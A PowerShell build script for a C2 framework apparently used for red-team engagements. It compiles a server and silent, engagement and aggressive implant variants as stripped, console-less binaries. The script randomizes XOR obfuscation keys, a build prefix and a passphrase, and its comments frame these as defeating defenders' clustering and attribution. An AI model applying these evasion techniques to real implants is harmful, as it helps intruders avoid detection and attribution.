# SentinelC2 agent + c2_server build script.
#
# Compiles all 3 agent variants (silent / engagement / aggressive)
# and the c2_server. Run from this directory:
#
#   .\build.ps1
#
# Override nim binary with $env:NIM = "D:\path\nim.exe" if it's not
# on PATH.
#
# Generated per-build include files (all gitignored, all wiped on each run):
#   xorkey.nim        16-byte rolling-XOR key (was: 16-byte, was a key
#                     per variant; now shared across all binaries in one
#                     build invocation so server and agents agree)
#   prefix.nim        3-char BuildPrefix, randomized per build
#                     (was: literal "X7K" in c2_server source)
#   secret.nim        operator passphrase for S_SECRET, per build
#                     (was: literal "sentinel-engagement-q4-2026-...")

$ErrorActionPreference = "Stop"

function Write-Utf8NoBom {
    param(
        [Parameter(Mandatory = $true)][string]$Path,
        [Parameter(Mandatory = $true)][string]$Content
    )
    [System.IO.File]::WriteAllText($Path, $Content, (New-Object System.Text.UTF8Encoding($false)))
}

$ProjectDir = $PSScriptRoot
$BuildDir = Join-Path $ProjectDir "build"
$SrcDir = $ProjectDir
$Nim = if ($env:NIM) { $env:NIM } else { "nim" }

# Verify toolchain
if (-not (Get-Command $Nim -ErrorAction SilentlyContinue)) {
    if (-not (Test-Path $Nim)) {
        Write-Error "nim not found. Set `$env:NIM or add nim to PATH."
        exit 1
    }
}

# Use OS CSPRNG for all per-build entropy. Get-Random is MT19937 and
# has too little internal state for anything that ends up baked into
# the binary.
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()

# ---------------------------------------------------------------
# Generate a per-build rolling XOR key for string obfuscation.
# The key is written to xorkey.nim, which agent.nim + c2_server.nim
# include at compile time. One key shared by all binaries in this
# build invocation so server and agents can interop.
# ---------------------------------------------------------------
function New-XorKeyNim {
    param([string]$OutPath)
    $bytes = New-Object byte[] 16
    $script:rng.GetBytes($bytes)
    $hexParts = @()
    foreach ($b in $bytes) { $hexParts += ("0x{0:x2}" -f $b) }
    $keyBody = $hexParts -join ", "
    $content = "# Auto-generated per-build XOR key. Do NOT edit.$([Char]10)# This file is regenerated by build.ps1 before each compile.$([Char]10)const XorKey: array[16, byte] = [byte $keyBody]$([Char]10)"
    Write-Utf8NoBom -Path $OutPath -Content $content
}

# ---------------------------------------------------------------
# Generate prefix.nim - randomized 3-char BuildPrefix.
# Replaces the literal "X7K" that was a free cross-deployment
# clustering key. Alphabet excludes 0/O/1/l for log readability.
# ---------------------------------------------------------------
function New-PrefixNim {
    param([string]$OutPath)
    $bytes = New-Object byte[] 3
    $script:rng.GetBytes($bytes)
    $alphabet = 'ABCDEFGHJKMNPQRSTUVWXYZabcdefghjkmnpqrstuvwxyz23456789'
    $prefix = -join ($bytes | ForEach-Object { $alphabet[$_ % $alphabet.Length] })
    Write-Utf8NoBom -Path $OutPath -Content "const BuildPrefix* = `"$prefix`"`n"
    return $prefix
}

# ---------------------------------------------------------------
# Generate secret.nim - operator passphrase for S_SECRET.
# Priority: $env:C2_AGENT_PASSPHRASE > 256-bit random hex.
# The previous baked engagement passphrase was replaced with generated input.
# was dictionary words containing the project name and a fiscal quarter -
# attribution nail and low entropy. The random fallback has 256 bits
# and ships no project fingerprint.
# ---------------------------------------------------------------
function New-SecretNim {
    param([string]$OutPath)
    if ($env:C2_AGENT_PASSPHRASE -and $env:C2_AGENT_PASSPHRASE -ne "") {
        $passphrase = $env:C2_AGENT_PASSPHRASE
    } else {
        $bytes = New-Object byte[] 32
        $script:rng.GetBytes($bytes)
        $passphrase = -join ($bytes | ForEach-Object { '{0:x2}' -f $_ })
    }
    $escaped = $passphrase.Replace('\', '\\').Replace('"', '\"')
    Write-Utf8NoBom -Path $OutPath -Content "const SECRET_PLAINTEXT* = `"$escaped`"`n"
    return $passphrase
}

# Clean build dir, then build all 3 variants
if (Test-Path $BuildDir) {
    Remove-Item -Recurse -Force $BuildDir
}
New-Item -ItemType Directory -Path $BuildDir | Out-Null

# Build flags shared by all variants
$BaseFlags = @(
    "c",
    "-d:release",
    "-d:ssl",
    "--opt:size",
    "--app:gui",
    "--passL:-s"
)

# Generate the shared xorkey + prefix + secret ONCE per build invocation
# so all binaries in this build (c2_server + every agent variant) agree
# on the obfuscation key, the BuildPrefix, and the shared S_SECRET.
$xorKeyPath = Join-Path $SrcDir "xorkey.nim"
$prefixPath = Join-Path $SrcDir "prefix.nim"
$secretPath = Join-Path $SrcDir "secret.nim"

# Build the c2_server first (no variants)
Write-Host "[*] Building c2_server..." -ForegroundColor Cyan
try {
    New-XorKeyNim  -OutPath $xorKeyPath
    $prefix  = New-PrefixNim  -OutPath $prefixPath
    $passphrase = New-SecretNim -OutPath $secretPath
    Write-Host "[*]   BuildPrefix=$prefix  passphrase=$($passphrase.Substring(0, [Math]::Min(8, $passphrase.Length)))... ($($passphrase.Length) chars)"

    # Nim writes progress dots/hints to stderr; with redirected stderr
    # and EAP=Stop that surfaces as a terminating NativeCommandError.
    $prevEAP = $ErrorActionPreference
    $ErrorActionPreference = "Continue"
    $ServerFlags = @("c", "-d:release", "-d:ssl", "--threads:on", "--opt:speed", "--path:common")
    & $Nim @ServerFlags `
        --out:(Join-Path $BuildDir "c2_server.exe") `
        (Join-Path $SrcDir "c2_server.nim")
    if ($LASTEXITCODE -ne 0) { throw "c2_server build failed" }

    # Build each agent variant. Same xorkey/prefix/secret as the server
    # so they agree. The agent's stream cipher (common/streamcrypto.nim)
    # expects a 32-byte key, but the c2_server's rolling XOR uses 16
    # bytes. They live in different obfuscation domains - the server
    # uses its own 16-byte XorKey for its obf strings, the agents use
    # their own 32-byte XorKey for theirs. The S_SECRET is what both
    # sides actually share.
    $Variants = @{
        "agent_silent.exe"      = @()
        "agent_engagement.exe"  = @("-d:variant_engagement")
        "agent_aggressive.exe"  = @("-d:variant_aggressive")
    }

    foreach ($kv in $Variants.GetEnumerator()) {
        $name = $kv.Key
        $defines = $kv.Value
        Write-Host "[*] Building $name ..." -ForegroundColor Cyan
        $flags = @("c", "-d:release", "-d:ssl", "--opt:size", "--app:gui", "--passL:-s", "--path:common") + $defines
        & $Nim @flags `
            --out:(Join-Path $BuildDir $name) `
            (Join-Path $SrcDir "agent.nim")
        if ($LASTEXITCODE -ne 0) { throw "$name build failed" }
    }
    $ErrorActionPreference = $prevEAP
} finally {
    # Always clean up the generated include files so they don't
    # accidentally get committed or poison the next manual compile.
    if (Test-Path $xorKeyPath)  { Remove-Item -Force $xorKeyPath }
    if (Test-Path $prefixPath)  { Remove-Item -Force $prefixPath }
    if (Test-Path $secretPath)  { Remove-Item -Force $secretPath }
}

# Build the unit test (no variants)
Write-Host "[*] Building tests..." -ForegroundColor Cyan
$TestDir = Join-Path $ProjectDir "tests"
if (Test-Path (Join-Path $TestDir "test_crypto.nim")) {
    $prevEAP2 = $ErrorActionPreference
    $ErrorActionPreference = "Continue"
    & $Nim @BaseFlags `
        --out:(Join-Path $BuildDir "test_crypto.exe") `
        (Join-Path $TestDir "test_crypto.nim")
    $ErrorActionPreference = $prevEAP2
    if ($LASTEXITCODE -ne 0) { Write-Warning "test_crypto build failed (non-fatal)" }
}

# Post-build audit: fail if any known plaintext leaks are in c2_server.exe
$auditScript = Join-Path $ProjectDir "tests\audit_server.py"
$serverExe = Join-Path $BuildDir "c2_server.exe"
if ((Test-Path $auditScript) -and (Test-Path $serverExe)) {
    Write-Host "[*] Running plaintext audit on c2_server.exe ..." -ForegroundColor DarkGray
    $auditOut = & python $auditScript --binary --strict $serverExe 2>&1
    if ($LASTEXITCODE -ne 0) {
        Write-Host "[!] AUDIT FAIL: c2_server.exe has plaintext leaks" -ForegroundColor Red
        Write-Host $auditOut
        exit 2
    }
    Write-Host "[*]   audit OK" -ForegroundColor DarkGray
}

# Summary
Write-Host ""
Write-Host "[+] Build complete. Output in: $BuildDir" -ForegroundColor Green
Get-ChildItem $BuildDir -Filter "*.exe" | Format-Table Name,
    @{N='SizeMB';E={[math]::Round($_.Length/1MB,2)}} -AutoSize
